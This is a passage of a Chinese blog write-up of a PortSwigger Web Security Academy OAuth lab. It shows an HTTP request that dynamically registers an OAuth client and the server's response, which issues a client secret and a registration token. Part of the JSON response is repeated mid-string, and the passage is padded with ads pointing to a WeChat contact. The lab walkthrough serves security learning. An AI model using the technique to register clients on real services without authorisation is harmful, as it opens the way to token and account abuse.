最终找到:https://oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net/reg
- 构造数据包,测试动态注册Oauth服务账户
POST /reg HTTP/1.1
Host: oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net
Content-Type: application/json
Content-Length: 59
{
"redirect_uris" : [
"https://example.com"
]
}
响应数据包,成功
HTTP/1.1 201 Created
X-Powered-By: Express
Pragma: no-cache
Cache-Control: no-cache, no-store
Content-Type: application/json; charset=utf-8
Date: Thu, 26 May 2022 21:50:40 GMT
Connection: close
Keep-Alive: timeout=5
Content-Length: 874
{"application_type":"web","grant_types":["authorization_code"],"id_token_signed_response_alg":"RS256","post_logout_redirect_uris":[],"require_auth_time":false,"response_types":["code"],"subject_type":"public","token_endpoint_auth_method":"client_secret_basic","introspection_endpoint_auth_method":"client_secret_basic","revocation_endpoint_auth_method":"client_secret_basic","require_signed_request_object":false,"request_uris":[],"client_id_issued_at":1653601840,"client_id":"iY5mnwgiJllrLS-Z2GJC8","client_secret_expires_at":0,"client_secret":"A8nOzvLB-czgTiYgLxLYcZhTwVD-yI3Vky2UebY44ChL2L-yFf4l55VnKQPzPP1KRKgA2nC6OV1lmOWWl_iQow","redirect_uris":["https://example.com"],"registration_client_uri":"https://oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net/reg/iY5mnwgiJllrLS-Z2GJC8","registration_access_token":"lJqCBOE8Su4OY9SAcF0WwGg-9K85IylOIPDhlVr2tRH"}
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注大数据)**
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
response_alg":"RS256","post_logout_redirect_uris":[],"require_auth_time":false,"response_types":["code"],"subject_type":"public","token_endpoint_auth_method":"client_secret_basic","introspection_endpoint_auth_method":"client_secret_basic","revocation_endpoint_auth_method":"client_secret_basic","require_signed_request_object":false,"request_uris":[],"client_id_issued_at":1653601840,"client_id":"iY5mnwgiJllrLS-Z2GJC8","client_secret_expires_at":0,"client_secret":"A8nOzvLB-czgTiYgLxLYcZhTwVD-yI3Vky2UebY44ChL2L-yFf4l55VnKQPzPP1KRKgA2nC6OV1lmOWWl_iQow","redirect_uris":["https://example.com"],"registration_client_uri":"https://oauth-ac421fca1ff0dfc0c03c549c0225007f.web-security-academy.net/reg/iY5mnwgiJllrLS-Z2GJC8","registration_access_token":"lJqCBOE8Su4OY9SAcF0WwGg-9K85IylOIPDhlVr2tRH"}
**网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。**
**需要这份系统化的资料的朋友,可以添加V获取:vip204888 (备注大数据)**
[外链图片转存中...(img-o3oM2UN2-1713407261251)]
**一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!**
扫一扫
1121
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
